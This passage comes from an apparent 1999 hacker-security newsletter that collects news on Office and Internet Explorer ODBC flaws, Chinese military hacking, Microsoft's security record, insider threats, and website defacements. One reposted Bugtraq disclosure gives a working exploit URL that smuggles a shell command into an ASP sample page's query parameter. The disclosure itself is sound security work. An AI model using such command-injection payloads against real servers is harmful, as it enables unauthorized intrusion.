particularly insidious because they allow
intruders to plant malicious programs on a
computer merely by sending an e-mail message
or by luring a victim to a malicious Web page
that automatically plants a file on the visitor's
hard drive.
In either case, the victim would receive no
warning of a potential security violation because
the flaws enable intruders to bypass the security
controls of Internet Explorer and pass
undetected through traps set by antivirus
software.
Tom Noonan, president of Internet Security Systems in Atlanta, said on
Tuesday that several of his client corporations had expressed concern
that "now that this information is in the wild, their systems are exposed."
"They worry that they are building their network on top of a vulnerable
system," he said.
Unlike the Melissa virus or the Explore.exe worm, programs that exploit
these newly discovered security bugs do not require that the victim take
any action; rather, such programs can be activated if a user merely reads
a malicious piece of e-mail while online.
As of this evening, there had been no reports of intruders having
exploited the flaws, but Microsoft announced that the problems had
prompted plans for a major change in the security design of its Windows
operating system and the Internet Explorer browser that it recently
integrated into Windows.
Currently, if Internet Explorer encounters on-line documents created by
one of the Microsoft Office suite of programs -- Word, Excel or
Powerpoint -- it assumes that they are "safe" and loads them on the
user's computer without warning.
The problem is that these are very powerful documents capable of
launching executable code, whether benign or malicious. Microsoft said
future operating systems would not trust such documents.
Andrew Dixon, the Microsoft Office product manager, said the company
was developing an applet, or small Java program, that would issue a
warning before opening Office documents.
The immediate problem with Office is that Word or Excel documents can
relay an arbitrary command to a computer through a flawed data-base
component that shipped with all but the last boxes of Office 97.
The Office team worked over the weekend to develop and test a solution
to this, Dixon said. But by this evening they still did not feel confident
enough to release a patch for the problem to the 50 million registered
users of Office 97. When a patch is available, he said, it will be posted
on the Web at http://officeupdate.microsoft.com/Articles/MDACtyp.htm.
In addition to the Office flaws, security holes were found last week in
software shipped with Hewlett-Packard's Pavilion models and Compaq's
Presarios. Both models were designed to offer customers remote support
via the Internet, using Microsoft's browser. Both computer makers
configured the browser to allow powerful little programs to run without
warning the user.
Unfortunately, these applets have the ability to run any other programs.
Hewlett-Packard planned to have a patch available soon, said a
company spokesman, Ray Aldrich. He said the fix would be posted on
the Web at http://www.hp.com/support/hppavilion.html.
"We believe this problem is serious and should be immediately
addressed," Aldrich said.
"We do so much testing but sometimes we miss stuff."
Hedy Baker, the public relations manager for Compaq's consumer
product division, said the company planned to issue an advisory on
Wednesday to Compaq support centers and expected to send out a
software update to owners of the affected Presarios by the end of next
week.
@HWA
36.0 CHINESE CYBER WARRIORS
~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 3rd August 1999 on 7:39 pm CET
After NATO strikes on Yugoslavia, when China's embassy was accidentally hit, cyber
war between American and Chinese hackers started. Chinese military wants to train,
as they say "professional cyber warriors" to be ready for on-line battle. More on the
topic from managing editor of asia.internet.com here.
From asia. internet.com
Chinese Military Seeks to Train Cyber Warriors
August 3, 1999
By Hans Lombardo
Managing Editor, asia.internet.com
International News Archives
[Hong Kong, CHINA] The Chinese military hopes to develop the capability of engaging in warfare over the Internet by training
hackers to take the battle online.
The Liberation Army Daily (LAD), a mouthpiece of China's Peoples Liberation Army (PLA), recently called for the development
of this capability. The paper said that, by recruiting civilian hackers and training "cyber warriors" at Army schools, China could be
prepared for an Internet war.
The call was made in response to several hacking incidents in the US and China after NATO's bombing of the China's Belgrade
Embassy. The Army paper reported that a "battle" was fought on the Internet between US and Chinese hackers.
In May, Chinese hackers infiltrated various US government sites including the Department of Energy (DOE), the Department of the
Interior (DOI), the US Embassy in China, and the Naval Communications Command. Nearly a thousand US civilian sites were
broken into in the two days following the bombing, sources said.
According to the Chinese military paper, US hackers responded by "counterattacking" several civilian sites in China.
More recently, the Chinese government has been accused of waging a cyber war against the outlawed Chinese sect, Falun Gong.
Webmasters in Canada, the US, and the UK have reported that their sites, hosting or linking to the sect's sites, were sabotaged or
brought down by hackers traced to Chinese domains.
In addition to this, Beijing has moved its rhetorical campaign against the sect on to the Web. The China Internet Information Center
and The China Daily have set up anti-Falun Gong sites.
@HWA
37.0 MICROSOFT AND SECURITY (AGAIN)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 3rd August 1999 on 6:30 pm CET
SecurityPortal has a nice analysis of Microsofts problem with security (below). Their
conclusion: realize MS isn't going away, but they need to be held accountable for the
security of their products before they are released as well as after they are in
production. The open source initiative is mentioned here as a possible way to do that
keep track of those problems. But then still, the Windows 9x product needs to die.
CNET has an article on the new MS OS beta-versions, is MS learning their lesson?
See for yourself below.
CNET:
Does Microsoft's next OS point to strategy shift?
By Stephanie Miles
Staff Writer, CNET News.com
August 3, 1999, 6:15 a.m. PT
URL: http://www.news.com/News/Item/0,4,40064,00.html
Microsoft's next consumer operating system will meld together bits and pieces of both Windows 98 and Windows 2000, according to those who have seen an early
version of the release, a hodgepodge that raises questions about the company's overall strategy for its consumer platform.
Microsoft has changed its strategy for the future of consumer Windows several times in the last few years, reacting to various hardware advances, delays in the
release of its corporate operating system, and personnel reorganizations within the company.
Currently, the official stance is this: Microsoft will release Millennium, another version of Windows 98, next year and Neptune, a consumer version of NT, in 2001 at
the earliest.
However, the lines are not clear-cut because beta testers now report that Millennium contains elements of Windows NT, the consumerish Windows 98 and
Windows 2000, a corporate desktop operating system coming at the end of this year. Microsoft recently released a preliminary version of the Millennium code to
developers and hardware partners.
Although observers say these kinds of twists and turns are typical on the road to a major software release, some critics wonder if all the changes might actually be
fueled by competitive challenges, such as the Linux operating system and America Online's popular instant messaging software.
If anything, Microsoft appears to be busy grafting. The Windows Explorer file manager appears to be comprised almost completely of Windows 2000 code and is
identified in the operating system as being from Windows 2000, according to Chris Hilbert, Webmaster at BetaNews, a beta testing Web site, while some of the
help files appear to be based on Windows 98, Second Edition.
"I think Millennium is just something they threw together to ooh and ahh the audience with this developer release," Hilbert said, adding that he does believe that the
core of the operating system is based on Windows 98, as Microsoft has said. "I believe the guts, or kernel of the operating system, is still Windows 98 based,
although a good portion of [Windows] Explorer does show signs of being Windows 2000."
Originally, last year's Windows 98 was targeted as the last release based on the DOS operating system. Future consumer operating systems were expected to be
based on Windows 2000, a variant of Windows NT.
That strategy was then scuttled in favor of continuing the life of Windows 98 through incremental updates. Windows 98 Second Edition, released earlier this summer,
was one such update. Millennium will be another. Windows 2000 has since been a victim of numerous delays, but is expected in corporate systems by the end of the
year.
Microsoft product managers could not replicate any scenarios that would identify the software as anything other than Millennium, a company spokesperson said, but
conceded that the development team may have lifted code for minor features like dialogue boxes from Windows 2000.
"There's no reason to invent whole new code--but that doesn't affect the fact that they're based on completely separate kernels," she said, explaining that using
different code is merely a shortcut for the development team. "It shouldn't be necessary to reinvent the wheel. They can use the efforts of other groups."
But testers assert that the situation affects far more than an isolated dialogue box or two. Justin Jenkins, Webmaster of BetaLabs calls Millennium "Windows 2000
skin over Windows 98, as far as I can tell."
It's still quite early in the development process for Millennium, and Hilbert notes that trial versions of Windows 98 contained references to Windows 95. However,
developers and hardware partners depend on early releases of operating system software to make long-term product plans, analysts say.
www.securityportal.com
Security: How big of a chink in Microsoft's armor?
BO2K Information Center
August 2, 1999 - This past week's news of yet another major security
vulnerability with Microsoft's products, this time with the ODBC database driver in
Excel 97, has lead SecurityPortal.com to take a look at the big picture, and
attempt to understand how big of a security problem Microsoft has.
This latest security vulnerability is one of the most frightening to date, as it
allows shell commands to be executed by opening a spreadsheet, without any
warning whatsoever. The ODBC database driver, installed with Excel 97, supports
a wide variety of system calls as part of its middleware approach to integrating
applications. Among these APIs is an ability to invoke shell commands. Because
this is ODBC, and not a macro, there is no warning imparted to the user. A user
could download a spreadsheet, only to find that it has deleted files, made
registry entries, or a number of other malicious acts, completely in stealth.
Do security problems plague Microsoft because of their size, or are there other reasons? There are plenty of reasons to
love or hate Microsoft. If you have owned Microsoft stock for the past several years, you probably love them. If you
have tried to compete with them on any front, you probably hate them. Their penchant for consuming any technology
or application space is well known, from dominating the word processor market to eating away at Netscape's browser
share to attempting to co-opt Java. Microsoft has shown no fear of getting into new businesses and has experienced
mixed results, such as with WebTV, City Sidewalk and several others. No doubt, Microsoft plays the role of the 800
pound gorilla to perfection, and they are a magnet for publicity, both good and bad. As Microsoft aggressively pursues
new markets and continued dominance in existing markets, are they adequately protecting the backdoor?
Microsoft is in the crosshairs of the hackers, that is no doubt. M$, Windoze - these negative nicknames are certainly
only there to mock Microsoft, and there do not seem to be equivalent negative terms for other companies. There is a
fair amount of validity to Microsoft's claim that Back Orifice 2000, for example, could have been written for other
platforms and was mostly written to embarrass Microsoft. However, we believe it is a leap of faith to claim that all of
Microsoft's security issues are relative the popularity of their products, and other competing products have the same
problems.
What are architectural differences between Microsoft operating systems and others? Windows 98 and Windows NT are
two completely different operating systems, each with its own heritage. Windows 98 can be traced back almost to the
origins of the company itself, as it is an iteration of MS-DOS. Windows 98 is a personal operating system. Its design
and capabilities are to act as a single user operating system, with penultimate consideration being given to that one
person behind the keyboard. The efforts put into Windows over the years have been to simplify the tasks of that one
person, with considerations for the rest of the world being bolted on: network access, file sharing and of course,
security. There is no concept of different levels of local system authority, user context versus administrative, file
system permissions, etc. It is a completely unsophisticated core operating system that over time has been overlaid
with a terrific set of end user features. These are major issues with the Windows 9x operating system that make it
wholly unsuited with the security requirements of the connected world.
Windows NT owes its existence to the fractured relationship Microsoft and IBM had over OS/2 ten years ago. Microsoft
didn't agree with IBM that Windows did not have a future and sought to build its own "OS/2" to compete in the
enterprise market. Microsoft wanted it to be a GUI to the core, and although it was influenced by many technologies,
notably VMS, it was a brand new operating system. Unlike Windows 9x, it was built to be a multi-user operating system
from the beginning. The concepts of a superuser, user, guest, contexts, inherited privileges are all in there. The Local
Security Authority of NT authenticates and provides access based upon access control lists that extend to file
systems, processes and any other objects defined by the system. In essence, it has a lot of the security features of
Unix; it is simply less mature, with more security bugs yet to be exploited. This immaturity often leads to add-on
applications not fully taking advantage of the security model and defaulting to additional services being implemented in
an insecure manner, often by installation with administrator rights. NT is just as susceptible to application borne
viruses as 9x, including programs like Melissa, although a virus that tries to directly access hardware or specific files
may be constrained by the user's privileges.
While there are stark differences in the foundation and architecture of these two operating systems, there are also
security vulnerabilities common to both platforms, caused by other product groups within Microsoft. The effort to
create a tight integration of its operating systems with Internet Explorer and Office has not only gotten Microsoft into
hot water with the Department of Justice over possible antitrust violations, but has created an integrated security
nightmare. Because of this integration, Windows 98 and NT (to a somewhat lesser degree, it depends upon the
machine account privileges the user has) are unique among major operating systems in that a malicious hacker can
create a program on a web site that can be opened and in one step destroy a computer. Tightly integrating
applications with operating systems is bad for security, probably the worst thing Microsoft has done for security. In
fact, it could be argued that Windows NT has a fairly good security model, until you start adding Microsoft applications
on top of it. Some observations:
The Windows 9X product needs to die, and Microsoft will need to be pushed to make this happen. There have
been several occasions where the product end of the Windows 9X line has been predicted, even positioned by MS
executives as a stepping stone to NT. Yet it has outlived even many internal projections within Microsoft, for the
simple reason being that it is a cash cow. The momentum behind its huge legacy created a product that has by far
outsold NT with lower development costs. How do you financially justify shutting something like that off? This is
something that has been argued long and hard internally within Microsoft, to the point that you would probably be
safer sharing a cab with an NT and Linux developer, than with an NT and Win98 developer. CIOs need to keep in mind
that much of the future threats to their infrastructure will come from within, and there is no really safe place to use
Windows 9x. If you need to run Windows, you need to run NT.
Microsoft needs to make secure computing the cornerstone of the company, and the foundation of every
product and service offering. For the end user right now, Microsoft practices "Are you sure?" security: "Are you
sure" you want to run this macro, open that file? In fact users are often uncertain if the file they are about to open is
going to work as advertise, or is going to wreak havoc on their system. If you look at the Security tab within Internet
Explorer, you see different "zones" that you can define settings for: Internet, Intranet, Trusted Sites and Restricted
Sites. Even if users could accurate index the world according to these categories, it is very crude and not very useful.
Systems need to function under the principle of least privileges, and in a large Intranet for example, there could very
definitely be one or two servers with malicious trojans.
Microsoft haters need to know MS is not going away, and need to get over it. Industry giants die hard. Bill Gates
has liked to tell the story about when he first saw kit microprocessors, he thought IBM was toast. I remember the first
80386 processors being promoted as a mainframe on a chip and again IBM was predicted to be in deep trouble. What
people did not realize was that as expensive as the big iron was, the investment in mainframe applications, Cobol code
and business processes was infinitely greater. The point here is that Microsoft is not going away. Enterprises with a
heavy investment in Microsoft desktops are not going to upgrade to Linux stations with KDE en masse any time soon.
Linux, with its heritage as a Unix derivative, and intense scrutiny by a million developers, is a strong competitive threat
to the same hardware markets that Microsoft sells its own operating systems. While pushing Linux strongly on the
desktop has not been a topic many CIOs have looked at closely, it is growing strongly and in many cases displacing NT
in the application and file server market. We at SecurityPortal.com have made it no secret that we predict a rosy
future for Linux. It is in fact a real long term threat to Windows, but not Microsoft. It is only a matter of time before
Microsoft releases its own Linux distribution. Microsoft is not going anywhere and needs to be part of the security
solution.
Microsoft needs to be held accountable for the security of their products before they are released as well as
after they are in production. There needs to be some independent review of Microsoft's code for security
vulnerabilities. We can think of no better way to do this than to join the Open Source initiative and in effect put its
software in the public domain. This would be a radical departure for Microsoft, but no other single action in the
industry could do so much to improve security.
To get back to our original question, Security: How big of a chink in Microsoft's armor? It is a very big problem. The
years of focus on user friendliness, leveraging operating system dominance against competitive applications and
internal strife has built an insecure house of cards. We need to put the walls back between our applications and
operating systems. We need third party auditing and accountability for code, possibly through Open Source initiatives
within Microsoft. Most of all, we need every CIO to demand that Microsoft reinvent itself around security, just as it
reinvented itself around the Internet a few years ago.
@HWA
38.0 THE ENEMY WITHIN
~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 3rd August 1999 on 1:00 pm CET
"Companies think if they buy an expensive 'firewall', they are secure because the bad
guys are outside. "In reality, the majority of the threat comes from within." Dealing
with the fact computer hacking is often an inside job, here are some of the main
targets of such an attack. Full story below.
AUG 3 1999
Computer hacking often an inside job
By LEONG CHAN TEIK
THE enemy is within -- that is the harsh reality that many
companies have yet to grasp, so say two experts on
computer network security.
Mr Jeff Moss, 29, director of professional services at
Nasdaq-listed Secure Computing Corporation, said
yesterday: "Companies think if they buy an expensive
'firewall', they are secure because the bad guys are
outside.
"In reality, the majority of the threat comes from within."
He is a former hacker who now breaks into corporate
networks only when employed by owners who want to
find out their areas of vulnerability.
He told The Straits Times that at a basic level,
employees can now easily buy software or download
software from the Internet that allows them to read their
colleagues' e-mail.
"There are many tools to do it for you. You don't need
to know a lot of technical stuff."
Frequently, that is not going to hurt anyone but there will
be occasions when the companies' systems will be under
threat.
Said Mr Moss, who is conducting a seminar for some
200 government and private-sector IT staff here today:
"One guy learnt that he was going to be fired. He had
the whole day to really damage the network if he wanted
to."
A common weakness of networks is that they do not
segregate, say, the engineering department from the
accounting department.
This makes for an open system that is vulnerable to
attack from all corners.
Mr Colin Smillie, 26, technical manager of Secure
Computing, said a favourite target of hackers is other
users' passwords.
And it is an easy target.
Once they have succeeded in getting the passwords,
they can access confidential files or send e-mail.
He said a solution lies in a pager-like device made by his
company which generates passwords for one-time use
only.
The holder keys in his personal identification number into
the device which will then generate the password he has
to use the next time he logs onto the network.
The network is pre-programmed to accept only that
password.
On the whole, Mr Moss and Mr Smillie said that
companies should pay attention to designing systems that
are resistant to an attack from within, which is more
costly and complex to do.
They have to hire more and brighter administrators.
The danger is getting bigger by the day, said Mr Moss,
who organises the yearly Def Con conventions in Las
Vegas where law enforcement agencies such as the US
Federal Bureau of Investigation and corporate America
meet hackers from around the world to discuss security
issues.
"You now have more temporary workers, consultants,
contractors and business partners who are there for the
day. The trend of more and more people sharing data
will continue," he said.
@HWA
39.0 DRUNKEN HACKERS ON JERRY SPRINGER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 3rd August 1999 on 3:15 am CET
"Drunken hackers: The women who love them and the admins who fear them." Lol,
yes the Website of the "Jerry Springer" show got hacked yesterday by "Hacking for
Drunks". The story is on Newsbytes, the mirror on Attrition.org
http://attrition.org/mirror/attrition/com/www.jerryspringer.com/
Springer Website Hacked! On The Next Jerry Springer!
By Bob Woods, Newsbytes
CHICAGO, ILLINOIS, U.S.A.,
02 Aug 1999, 3:48 PM CST
The phrase, "Drunken hackers: The women who love them and the admins who fear them," sounds like it would belong on
the "Jerry Springer" show - or at least its accompanying Website. The phrase was indeed on the site, but no one from the
show put it there.
A three-member group calling itself "Hacking for Drunks" (HFD) apparently cracked the site in recent days, putting up text
on the site that sounds as if it were stolen from a promotional TV spot for the show.
The site is located at http://www.jerryspringer.com
"On the next Jerry Springer... Meet beercan, b33rman, and beerb0ttl3," the hacked page began. "Three young men who
have given there (sic) up their lives to alcohol abuse and computer hacking. They have agreed to come on Jerry to tell there
story."
"These three men... will introduce everyone to their world of liquor, women, and computers," the text at the site went on.
"You will meet people whos (sic) lives they have changed, and lives they have ruined. They will tell their tale of how they
were draged (sic) into the computer underground, where the only rules... are there (sic) own."
"This amazing story of lost innocence will touch you, and keep you wondering what your children are doing on the
weekends," the text on the cracked site added.
As of 4:00 PM EST, the Springer site had not been restored, Newsbytes notes.
Officials from neither the Jerry Springer show nor the company that produces the shockfest, Studios USA, could be
immediately reached for comment.
Hacking for Drunks also claimed responsibility for the recent cracking of "The Blair Witch Project" Website, at
http://www.blairwitch.com . The Blair Witch Project is a movie that gained a large following even before its release across
the country, due in large part to Artisan Entertainment's Internet-based marketing of the flick.
The message at the Blair Witch site was much simpler: "BOO~!@#$%!... d1d w3 scar3 j00?"
The movie - made for $60,000 in the woods of Maryland - racked up $28.5 million this past weekend, in its first weekend of
release to 800 theaters.
Reported By Newsbytes.com, http://www.newsbytes.com .
15:48 CST
Reposted 23:25 CST
@HWA
40.0 DATA PROTECTION NOT TO BE IGNORED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Tuesday 3rd August 1999 on 3:00 am CET
A London-based legal firm has warned that organizations should not ignore their legal
requirements with regards data protection on the Web. Next to the threat by the EU
to take legal action against members who don't implement certain data protection
legislations, the firm, Tarlo Lyons, warns for the legal implications of data protection
for businesses. Story below
http://www.technologypost.com/ecommerce/DAILY/19990802105186419.asp?Section=Main
Published on Monday, August 2, 1999
E-COMMERCE
Data protection on Web
should not be ignored
NEWSBYTES
Tarlo Lyons, a London-based legal firm that has been
intricately involved with many aspects of the British
government's information technology (IT) operations
and legislation, has warned that organizations should not
ignore their legal requirements with regards data
protection on the Web.
The timely warning comes as the European Union (EU)
has threatened legal action against nine EU member
countries for failing to implement its new data protection
legislation.
According to the EU press office in Brussels, warning
letters have now been sent to government ministers in
France, Luxembourg, the Netherlands, Germany,
Ireland, the UK, Denmark, Spain, and Austria.
The legislation, which became law on a pan-European
basis in October of last year, goes beyond existing
single country laws in many EU member states in giving
citizens very broad rights as to how their personal data
is storied by companies.
Back in London, meanwhile, Andrew Rigby, head of
e-commerce and digital media with Tarlo Lyons, said
that many businesses operating in the EU may be
sending personal data overseas - something which
breaches Principle 8 of the new Data Protection Act
1998 and the European Union Directive number
(95/46/EC) on the protection and free movement of
personal information.
Despite the fact that many employees are unaware of
the legal issues relating to transborder personal data
transfers, Tarlo Lyons argues that the use of the Internet
may cause breaches of the law. The legal firm says that,
because of the use of the Internet as a means of
advertising and communication, many global businesses
are quite often using it both to collect personal
information and to send it to overseas offices.
Despite this stark warning, Tarlo Lyons is pragmatic
enough to say that, in general terms, exporting data is
fine if the receiving country is in the EU territories.
Problems, however, can occur in countries outside the
EU and where there are no similar laws protecting
consumers sending personal information.
The law firm singles out the US for clear criticism in this
regard, which it says does not have similar laws to those
seen in the EC. It warns that, in the absence of
reciprocal data protection laws in the importing country,
global businesses need to enter into inter- company
contracts so as to avoid breaching the law.
The bottom line to the increasing use of the Internet for
personal data transmissions, the law firm says, is that
businesses operating on a global scale cannot afford the
adverse publicity of being in breach of something as
fundamental as privacy and confidentiality.
Copyright (c) Post-Newsweek Business Information, Inc.
All rights reserved.
@HWA
41.0 WIRELESS ENCRYPTION HANDHELDS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Monday 2nd August 1999 on 11:50 pm CET
Puma Technology is said to announce this week that it will license Certicom's Secure
Sockets Layer (SSL) technology for its Intellisync synchronization products. This will
allow users on both Palm and Windows CE handheld devices to be able to use strong
data encryption over any wireless network. Full story below.
Wireless data encryption due for handhelds
By Ephraim Schwartz
InfoWorld Electric
Posted at 6:25 AM PT, Aug 2, 1999
Handheld devices will get a boost in security this week when Puma Technology announces that it will license Certicom's Secure Sockets Layer (SSL)
technology for its Intellisync synchronization products.
Corporate users of messaging, calendaring, and contact databases on both Palm and Windows CE handheld devices now will be able to synchronize over
any wireless network with so-called strong data encryption. The next version of Intellisync Anywhere, due to ship later this year, will include the Certicom
security software.
The ability to prevent the interception of data is a step toward adoption of handheld devices in the enterprise, but more is still needed, according to IT
consultants and industry analysts.
"The lack of security never kept handhelds from being officially supported devices," said Travis Hoxmeir, a consultant at Akila, a Portland, Ore., company
that helped the Pacific Gas and Electric Gas Transmission agency to deploy a handheld strategy. "Within IT, security is an important issue, but users just say,
'I want [a handheld]. Security is somebody else's problem, not mine,' " Hoxmeir said.
Though the Certicom technology will guard against midair interception of data, a bigger problem for IT is what data employees are putting on their handhelds,
according to Ken Dulaney, vice president of mobile computing at the Gartner Group, in San Jose, Calif.
The storage of company information on personally owned handheld devices is a serious problem, Dulaney said.
"We need something from Puma, like a console, that tracks what corporate data is flowing out to these devices," Dulaney added.
Puma Technology Inc., in San Jose, Calif., can be reached at www.pumatech.com. Certicom Corp., in Hayward, Calif., can be reached at
www.certicom.com.
@HWA
42.0 Y2K TO AID IN CYBERDEFENSE
~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Monday 2nd August 1999 on 11:30 pm CET
The Senate last week took its first close look at how the knowledge gained and used
to battle the Y2K problem can be used to guard now and in the future against attacks
on the nation's infrastructure. In a testimony before the Senate Special Committee on
the Y2K Technology Problem, federal experts said experience gained in this field
could be used to confront infrastructure protection issues. Read more.
http://www.fcw.com/pubs/fcw/1999/0802/fcw-newssecurity-08-02-99.html
AUGUST 2, 1999
Feds say Y2K experience aids in cyberdefense
BY DIANE FRANK (diane_frank@fcw.com)
The Senate last week took its first close look at how the expertise and
systems being developed to deal with the Year 2000 problem can be used now
and in the future against intentional attacks on the nation's infrastructure.
Testifying before the Senate Special Committee on the Year 2000 Technology
Problem, federal experts said experience gained by a special coordination center
created to gather and share information on problems caused by the Year 2000
date change could be used to confront infrastructure protection issues.
However, the center itself may not be needed beyond next March.
"Clearly, there will be much of value that will last beyond the [Year 2000
Information Coordination Center]," said John Koskinen, chairman of the
President's Council on Year 2000 Conversion. "This is in effect our first
real-time test...and ultimately, it is a great way for all of us to learn from this
experience."
President Clinton recently officially created the ICC, which will gather and
share information on incidents worldwide caused by the Year 2000 date change.
That information then will be used by agencies, state and local governments and
the private sector for a coordinated response. The Senate committee is
considering expanding its mission beyond the Year 2000 problem and its life
span beyond Feb. 29 to oversee the information security and critical
infrastructure protection efforts at the congressional level.
But federal officials involved in infrastructure protection issues told the
committee that the structures already are in place in the public and private
sectors to handle critical infrastructure protection. The officials added that the
ICC's information sharing mechanism and the partnerships created throughout
government and industry as part of that sharing will be key when dealing with
any incidents in the future when someone brings down a computer system that
controls a country's transportation, communication or energy infrastructures.
"Our collective efforts on Y2K should provide valuable lessons learned for the
continuing activities of the NIPC and the federal lead agencies in dealing with
cyber incidents after Y2K," said Michael Vatis, chief of the National
Infrastructure Protection Center at the FBI.
It is hoped that the experience gained from fixing the Year 2000 bug will cut
down on the time it will take to develop future responses and management to
critical infrastructure attacks, said John Tritak, director of the Critical
Infrastructure Assurance Office.
The Defense Department has plenty of experience dealing with cyberprotection
issues, but it plans to rely heavily on the structures that are being put in place
within the department to support the ICC, said Richard Schaeffer, director of
infrastructure and information assurance at the Office of the Assistant
Secretary of Defense for Command, Control, Communications and Intelligence.
Experts throughout government and industry have started to refer to the Year
2000 problem as the first real test of protecting the critical infrastructure of the
United States against computer system failures. Although any problems caused
by the Year 2000 date change will be unintentional, focus is turning to the
possible effect on the nation's infrastructure if someone deliberately attacked a
system in an attempt to bring it down.
Committee chairman Sen. Bob Bennett (R-Utah) and vice chairman Sen.
Christopher Dodd (D-Conn.) also raised several possibilities for more concrete
ways that agencies and industry can contribute, including continuing the ICC in
the role of a critical infrastructure protection center, creating a new organization
to oversee the coordination and even creating a "government chief information
officer," who would be at the level of an assistant to the president.
The key to infrastructure protection is how fast the response time is because the
longer the response takes, the longer you are vulnerable, said Winn Schwartau,
information warfare author and consultant. "We need a fundamental shift in the
way we approach security," Schwartau said. "It requires an empowerment
much farther down the chain of command."
@HWA
43.0 Yet Another ODBC Bugged ASP Sample Page
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Approved-By: aleph1@SECURITYFOCUS.COM
Received: from out4.ibm.net (165.87.194.239) by lists.securityfocus.com with
SMTP; 29 Jul 1999 07:32:23 -0000
Received: from storm (slip-32-101-214-12.ri.br.ibm.net [32.101.214.12]) by
out4.ibm.net (8.8.5/8.6.9) with SMTP id HAA116640; Thu, 29 Jul 1999
07:32:18 GMT
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.1
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Message-ID: <002901bed994$7765cca0$0cd66520@storm>
Date: Thu, 29 Jul 1999 04:32:05 -0300
Reply-To: "Wanderley J. Abreu Junior" <storm@UNIKEY.COM.BR>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Wanderley J. Abreu Junior" <storm@UNIKEY.COM.BR>
Subject: Yet Another ODBC Bugged ASP Sample Page
X-To: Microsoft Product Security Response Team <secure@microsoft.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Dear Team,
Exploiting ODBC Features that come with your sample programs is
not a mistery for any of us. So Let me add one more ASP Sample with similar
troubles:
http://server/ASPSamp/AdvWorks/equipment/catalog_type.asp
or yet
http://server/AdvWorks/equipment/catalog_type.asp
It lets you execute shell comands like the other scripts. It is
a Active Server Page so it runs the query as a local user and doesn't need
any type of Remote Data Service to access the DSN. It just require the
default DSN (advworks) set.
The Exploit command line can be for instance :
http://server/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c
+dir+c:\")|
Sorry if this SERIOUS security failure was already reported.
Regards,
Wanderley Junior
@HWA
44.0 New security mailing lists available from Security Focus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
hu Aug 05 1999
Security Focus is now offering 3 new mailing lists. Bugtraq Spanish, Bugtraq Japanese & Security Focus News.
Security Focus is now offering 3 new mailing lists. The first two are BUGTRAQ-JP (Japanese) and BUGTRAQ-ES (Spanish). The first one will
be moderated by Nobuo Miwa and the second one by Hernan Ochoa . The third is SF-NEWS.
Here is the charter of the first two new lists:
BUGTRAQ-[JP,ES] is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security
vulnerabilities: what they are, how to exploit them, and how to fix them.
The mailing list language is [Japanese|Spanish].
The mailing list is an offshoot of the BUGTRAQ mailing list. It was specifically created to allow people not comfortable with the English
language that speak [Japanese|Spanish] to have access to the same high-quality information as in BUGTRAQ.
If you do feel comfortable understanding English we recommend you instead subscribe to BUGTRAQ. You can do so by sending email to
LISTSERV@SECURITYFOCUS.COM with a message body of:
SUBS BUGTRAQ First-name Last-name
The moderator(s) of the list will make sure that any interesting discussion in BUGTRAQ is summarized, translated and posted to this list at
least once a week. Similarly any new information covered on this list that has not already been discussed in BUGTRAQ will be translated and
forwarded to it by the moderator(s).
To see the full charter of each list in its native language visit securityfocus.com and look under Forums.
The third new list is SF-NEWS. SF-NEWS is the Security Focus weekly summary mailing list. Of interest to BUGTRAQ readers is the
inclusion of a summary list of vulnerabilities posted to BUGTRAQ and elsewhere. So if you are overwhelmed by the traffic in BUGTRAQ this
may be the one for you.
Other things covered include a summary of incidents reported in the INCIDENTS lists, a summary list of positions being offered or resumes
being tendered as posted to the Security Jobs list, results from the weekly polls and Security Focus announcements.
To subscribe to any of these lists email LISTSERV@SECURITYFOCUS.COM with a message body of:
SUBS BUGTRAQ-JP First-name Last-name
or
SUBS BUGTRAQ-ES First-name Last-name
or
SUBS SF-NEWS First-name Last-name
@HWA
45.0 Beyond Virtual Vaccinations
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.sciencenews.org/sn_arc99/7_31_99/bob2.htm
(See url for graphics and charts, omitted from this textfile)
Beyond Virtual Vaccinations
Developing a digital immune system in bits and bytes
By Damaris Christensen
The fear of new, dangerous viruses sweeping through an unprotected population is not limited to public health officials.
Computer researchers have long worried because typical virus-scanning computer programs�which essentially vaccinate
machines against known viruses�become outdated as newly created viruses spread over the Internet.
Just as researchers turned to biology in applying the name virus to the pesky programs that could make computers sick,
several groups have turned to biology for a new model of how to protect computers against unknown viruses. They are focusing
on the human immune system.
These computer scientists hope to develop a digital system that, like the immune system, can quickly recognize and fight off
known infections, identify new intruders and learn how to deter them, and remember all previously encountered pathogens.
Such a system also needs to be safe, reliable, and secure.
A computer virus released in March aptly demonstrated the need for more-effective ways of fighting off computer viruses.
Although warnings about the Melissa virus went out soon after it was identified, it spread as quickly as the alarms (SN: 5/8/99,
p. 303). Within just a few days, the virus had circled the globe, sending countless unwanted E-mail messages across the
Internet and clogging E-mail service at hundreds of organizations, forcing them to shut off their Internet connections.
Although Melissa�the first virus to mail itself around the world�merely clogged E-mail systems, virus makers have already
launched spin-offs of the virus designed to destroy data.
The risk of computer infections rises as more information is exchanged through E-mail or over the Internet. Likewise, the
potential damage that viruses can create multiplies as people send sensitive personal and corporate data over the Internet.
Computer security experts also warn that the avenues for viruses to spread multiply dramatically as computers use software
that's integrated so that one program can launch another.
